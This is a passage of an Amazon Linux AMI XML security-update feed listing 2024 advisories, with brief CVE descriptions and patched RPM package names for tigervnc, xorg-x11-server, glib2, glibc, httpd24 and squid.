id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.68-3.22.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.68-3.22.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.22.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.68-3.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1927</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1927: important priority package update for tigervnc</title><issued date="2024-04-11 01:43:00" /><updated date="2024-04-15 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-31083:
The ProcRenderAddGlyphs() function calls the AllocateGlyph() function to store new glyphs sent by the client to the X server. AllocateGlyph() would return a new glyph with refcount=0 and a re-used glyph would end up not changing the refcount at all. The resulting glyph_new array would thus have multiple entries pointing to the same non-refcounted glyphs.
ProcRenderAddGlyphs() may free a glyph, resulting in a use-after-free when the same glyph pointer is then later used.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31083" title="" id="CVE-2024-31083" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc-debuginfo" version="1.8.0" release="21.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.8.0-21.36.amzn1.x86_64.rpm</filename></package><package name="tigervnc" version="1.8.0" release="21.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.8.0-21.36.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.8.0-21.36.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.8.0-21.36.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="21.36.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.8.0-21.36.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.8.0" release="21.36.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.8.0-21.36.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.36.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.8.0-21.36.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.36.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.8.0-21.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1928</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1928: important priority package update for xorg-x11-server</title><issued date="2024-04-11 01:43:00" /><updated date="2024-04-15 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-31083:
The ProcRenderAddGlyphs() function calls the AllocateGlyph() function to store new glyphs sent by the client to the X server. AllocateGlyph() would return a new glyph with refcount=0 and a re-used glyph would end up not changing the refcount at all. The resulting glyph_new array would thus have multiple entries pointing to the same non-refcounted glyphs.
ProcRenderAddGlyphs() may free a glyph, resulting in a use-after-free when the same glyph pointer is then later used.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31083" title="" id="CVE-2024-31083" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-devel" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.55.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.55.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.55.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.55.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.55.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1929</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1929: important priority package update for glib2</title><issued date="2024-04-11 01:43:00" /><updated date="2024-04-15 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-35457:
GNOME GLib before 2.65.3 has an integer overflow, that might lead to an out-of-bounds write, in g_option_group_add_entries. NOTE: the vendor's position is "Realistically this is not a security issue. The standard pattern is for callers to provide a static list of option entries in a fixed number of calls to g_option_group_add_entries()." The researcher states that this pattern is undocumented
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35457" title="" id="CVE-2020-35457" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2-debuginfo" version="2.36.3" release="5.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.27.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.27.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.27.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.27.amzn1.noarch.rpm</filename></package><package name="glib2" version="2.36.3" release="5.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.27.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.27.amzn1.x86_64.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.27.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.27.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.27.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.27.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.27.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.27.amzn1.i686.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.27.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1930</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1930: important priority package update for glibc</title><issued date="2024-04-25 16:04:00" /><updated date="2024-04-25 16:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-2961:
The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2961" title="" id="CVE-2024-2961" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-utils" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="324.190.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-324.190.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-324.190.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="324.190.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-324.190.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1931</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1931: important priority package update for httpd24</title><issued date="2024-04-25 16:04:00" /><updated date="2024-04-25 16:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-27316:
HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27316" title="" id="CVE-2024-27316" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.59" release="1.102.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.59" release="1.102.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.59-1.102.amzn1.noarch.rpm</filename></package><package name="mod24_ssl" version="2.4.59" release="1.102.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.59" release="1.102.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.59-1.102.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.59" release="1.102.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.59" release="1.102.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.59-1.102.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.59" release="1.102.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.59-1.102.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1932</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1932: important priority package update for xorg-x11-server</title><issued date="2024-04-25 16:04:00" /><updated date="2024-04-25 16:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-21886:
Heap buffer overflow in DisableDevice
NOTE: https://lists.x.org/archives/xorg/2024-January/061525.html
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/bc1fdbe46559dd947674375946bbef54dd0ce36b
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8
CVE-2024-21885:
Heap buffer overflow in XISendDeviceHierarchyEvent
NOTE: https://lists.x.org/archives/xorg/2024-January/061525.html
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/4a5e9b1895627d40d26045bd0b7ef3dce503cbd1
CVE-2024-0229:
Reattaching to different master device may lead to out-of-bounds memory access
NOTE: https://lists.x.org/archives/xorg/2024-January/061525.html
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/ece23be888a93b741aa1209d1dbf64636109d6a5
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/219c54b8a3337456ce5270ded6a67bcde53553d5
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/df3c65706eb169d5938df0052059f3e0d5981b74
CVE-2023-6816:
Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer
NOTE: https://lists.x.org/archives/xorg/2024-January/061525.html
NOTE: https://gitlab.freedesktop.org/xorg/xserver/-/commit/9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6816" title="" id="CVE-2023-6816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0229" title="" id="CVE-2024-0229" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21885" title="" id="CVE-2024-21885" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21886" title="" id="CVE-2024-21886" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-common" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.56.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.56.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.56.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.56.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.56.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1933</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1933: important priority package update for squid</title><issued date="2024-04-25 16:04:00" /><updated date="2024-04-25 16:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-46846:
Due to chunked decoder lenience Squid is vulnerable to Request/Response smuggling attacks when parsing HTTP/1.1 and ICAP messages.
